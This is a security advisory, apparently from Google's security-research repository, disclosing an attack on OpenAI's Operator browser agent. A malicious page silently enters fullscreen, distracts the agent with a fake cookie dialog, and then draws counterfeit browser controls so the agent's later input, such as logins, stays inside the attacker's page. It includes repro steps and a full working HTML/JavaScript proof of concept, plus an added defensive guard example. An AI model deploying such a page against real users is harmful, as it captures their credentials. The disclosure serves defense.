OpenAI Operator - Locking Operator on FullScreen
This vulnerability uses the Fullscreen API to enter fullscreen mode without the user's knowledge and then captures the user's subsequent actions (such as login information) through an iframe or other means, leading to the leakage of sensitive data. 2025-6-12 00:0:19 Author: github.com

Summary

When Operator actuates on a page, the website can trigger the Fullscreen API. If the page can grab Operator's attention while the browser's fullscreen notice is on the screen (e.g. by showing a cookie consent dialog), then Operator does not notice that it has entered fullscreen mode.
Therefore, any interaction with Operator after it visits the malicious page can be fully captured inside the malicious site, either by drawing fake browser controls plus an iframe or by rendering a remote browser in the DOM.

This means that any information entered thereafter (such as login credentials, email addresses, etc.) is fully compromised.
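The root cause described above is that the agent keeps trusting on-screen browser controls after the page has silently gone fullscreen. The following is an added example, not code from the advisory or from Operator: a small guard that an agent harness could run in the page context. It tracks the real Fullscreen API state through the `fullscreenchange` event and `document.fullscreenElement`, refuses actions that type text while fullscreen is active, and requires the harness to leave fullscreen before continuing. The `createFakeDocument` stand-in and the scenario walk-through are constructed so the guard can be exercised outside a browser; in a real page you would pass `document` itself.

```javascript
// Added example (not part of the advisory): a fullscreen guard for an agent harness.
// `doc` is a document-like object exposing fullscreenElement,
// addEventListener('fullscreenchange') and exitFullscreen().
function createFullscreenGuard(doc) {
  const state = {
    inFullscreen: Boolean(doc.fullscreenElement),
    transitions: [], // history of 'enter' / 'exit' events, useful for logging
  };

  // The Fullscreen API fires `fullscreenchange` on the document whenever
  // fullscreenElement changes. Track that signal instead of trusting what
  // the page paints on screen.
  doc.addEventListener('fullscreenchange', () => {
    state.inFullscreen = Boolean(doc.fullscreenElement);
    state.transitions.push(state.inFullscreen ? 'enter' : 'exit');
  });

  return {
    isInFullscreen: () => state.inFullscreen,
    transitions: () => state.transitions.slice(),

    // Policy: actions that type text (URLs, credentials, e-mail addresses)
    // are refused while fullscreen is active, because the URL bar and other
    // browser controls visible at that moment may be drawn by the page.
    checkAction(action) {
      if (state.inFullscreen && action.type === 'type') {
        return {
          allowed: false,
          reason: 'page is in fullscreen; visible browser controls are untrusted',
        };
      }
      return { allowed: true, reason: null };
    },
  };
}

// Constructed stand-in for `document` (assumption for running outside a browser).
// Real requestFullscreen()/exitFullscreen() return promises and fire the event
// asynchronously; the stand-in fires it synchronously to keep the demo simple.
function createFakeDocument() {
  const listeners = { fullscreenchange: [] };
  const doc = {
    fullscreenElement: null,
    addEventListener(name, fn) {
      listeners[name].push(fn);
    },
    requestFullscreen(el) {
      doc.fullscreenElement = el;
      listeners.fullscreenchange.forEach((fn) => fn());
    },
    exitFullscreen() {
      doc.fullscreenElement = null;
      listeners.fullscreenchange.forEach((fn) => fn());
    },
  };
  return doc;
}

// Walks the sequence from the advisory: the page enters fullscreen, then the
// agent is asked to type a URL into what looks like the browser's address bar.
function runScenario() {
  const doc = createFakeDocument();
  const guard = createFullscreenGuard(doc);

  const before = guard.checkAction({ type: 'type', text: 'wikipedia.org' });

  // The page's click handler calls requestFullscreen on the root element.
  doc.requestFullscreen({ tagName: 'HTML' });
  const during = guard.checkAction({ type: 'type', text: 'wikipedia.org' });
  const clickOnly = guard.checkAction({ type: 'click', target: '#got' });

  // Harness policy: leave fullscreen (await the promise in a real browser)
  // and re-check before typing anything.
  doc.exitFullscreen();
  const after = guard.checkAction({ type: 'type', text: 'wikipedia.org' });

  return {
    before: before.allowed,
    during: during.allowed,
    clickOnly: clickOnly.allowed,
    after: after.allowed,
    transitions: guard.transitions(),
  };
}

console.log(runScenario());
```

The guard deliberately keys on the browser's own fullscreen state rather than on anything the page renders, since the page controls every pixel once fullscreen is active. A stricter harness could refuse all actions, not just typing, until fullscreen has been exited and the real address bar is visible again.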

Repro steps

  1. Ask Operator: Summarize the following page: <URL of the PoC>.
  2. Observe that Operator summarizes the example.com content inside the iframe.
  3. Now ask: Can you go to wikipedia.org and tell me when OpenAI was founded?
  4. Observe that Operator actuates inside the fake browser controls.

Severity

Moderate - This vulnerability potentially allows an attacker to access information entered into Operator after Operator visits an attacker's page.

Proof of Concept

<meta charset="utf-8">
<body>
<div>
    <span>
        <a href="#" onclick="fullscreen()">クリックして進む</a><br>
    </span>
    <style>
    .cookie-consent-overlay {
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background: rgba(0, 0, 0, 0.5);
      display: none;
      z-index: 9999;
    }
    /* Centered modal */
    .cookie-consent {
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background: #333;
      color: #fff;
      padding: 40px;
      text-align: center;
      font-size: 24px;
      z-index: 10000;
      border-radius: 8px;
      width: 80%;
      max-width: 600px;
      box-shadow: 0 0 20px rgba(0,0,0,0.5);
    }
    .cookie-consent button {
      background: #f1d600;
      border: none;
      color: #333;
      padding: 15px 30px;
      font-size: 24px;
      cursor: pointer;
      margin-top: 20px;
      border-radius: 4px;
    }
      </style>
</div>
    <style>
        body {
            overflow-y: hidden;
        }
    </style>
    <template>
        <img style="position:absolute;right:0px;top:0px;" height="8%" src="https://test.shhnjk.com/google.png" width="100%">
        <input type=text style="position:absolute;left:128px;top:45px;width:1100px;outline: none;" value="https://example.com">
        <iframe src="https://example.com" width="100%" height="92%" frameBorder="0" style="position:fixed;top:76px;right:0px"></iframe>
        <div class="cookie-consent-overlay" id="cookieConsentOverlay">
    <div class="cookie-consent" id="cookieConsent">
          <b id=notice>This website uses cookies to ensure you get the best experience.</b>
          <br>
          <button id=got>Got it!</button>
          <button id=close style="display:none;text-align: center;">Close</button>
        </div>
      </div>
        <script>
        let input = document.querySelector('input');
        let f = document.querySelector('iframe');
        input.addEventListener("keypress", event => {
          if (event.key === "Enter") {
            if (!input.value.includes(".")) {
                input.value = "https://www.bing.com/search?q=" + input.value;
            } else if (!input.value.startsWith("http")) {
              input.value = "https://" + input.value;
            }
            f.src = input.value;
          }
        });
        </script>
    </template>
    <script>
        // Runs from the link's click handler, so the fullscreen request has user activation.
        function fullscreen() {
            document.documentElement.requestFullscreen();
            // Render the template (fake browser chrome, URL field and framed page) into the document.
            const template_content = document.querySelector('template').content;
            document.querySelector('div').appendChild(template_content);
            // Show the cookie consent dialog while the browser's fullscreen notice is visible.
            const overlay = document.getElementById("cookieConsentOverlay");
            overlay.style.display = "block";
            document.querySelector('#got').addEventListener('click',() => {
                document.querySelector('#got').style.display = "none";
                document.querySelector('#close').style.display = "block";
                document.querySelector('#notice').textContent = "Thank you for your understanding!";
            });
            document.querySelector('#close').addEventListener('click',() => {
                document.querySelector('#close').style.display = "none";
                overlay.style.display = "none";
            });
        }
    </script>
</body>

Timeline

Date reported: 03/07/2025
Date fixed: 05/14/2025
Date disclosed: 06/13/2025


Source: https://github.com/google/security-research/security/advisories/GHSA-mmgx-755h-wr74